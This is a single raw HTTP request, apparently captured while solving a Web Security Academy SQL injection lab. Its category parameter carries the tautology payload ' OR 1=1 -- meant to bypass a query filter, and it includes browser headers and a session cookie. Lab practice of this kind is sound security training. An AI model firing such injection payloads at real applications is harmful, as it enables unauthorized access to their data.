GET /filter?category=Accessories'%20OR%201=1%20-- HTTP/2
Host: 0ac3001904ba33d480643fae00190020.web-security-academy.net
Cookie: session=borxEUE6I3AkNtMPkExSAfU6Pab2c3aC
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac3001904ba33d480643fae00190020.web-security-academy.net/filter?category=Accessories
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
